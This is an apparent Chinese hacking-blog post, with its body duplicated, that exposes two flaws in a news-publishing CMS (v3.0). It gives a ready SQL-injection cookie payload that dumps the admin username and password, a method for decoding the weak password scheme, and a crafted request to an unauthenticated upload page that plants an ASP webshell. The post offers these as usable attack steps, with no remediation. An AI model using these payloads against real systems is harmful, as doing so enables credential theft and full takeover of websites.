雷驰新闻发布管理系统v3.0漏洞
第一个就是得到管理员的密码和用户名。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba
第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)
提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。
第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。
意思就是说,第一步都可以省略了来搞,汗~~~~
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''='
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba
第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)
提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。
第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。
意思就是说,第一步都可以省略了来搞,汗~~~~
相关日志
U盘操作系统Puppy Linux4.1正式版发布
IE 0day for IE6 and IE7
Internet Explorer 8 Beta 2 v8.0.6001.18241(含所有系统中文版)开始下载
跨站脚本执行漏洞代码的六点思路
CreateLive CMS Version 4.0 0day
U盘操作系统Puppy Linux4.1正式版发布
IE 0day for IE6 and IE7
Internet Explorer 8 Beta 2 v8.0.6001.18241(含所有系统中文版)开始下载
跨站脚本执行漏洞代码的六点思路
CreateLive CMS Version 4.0 0day
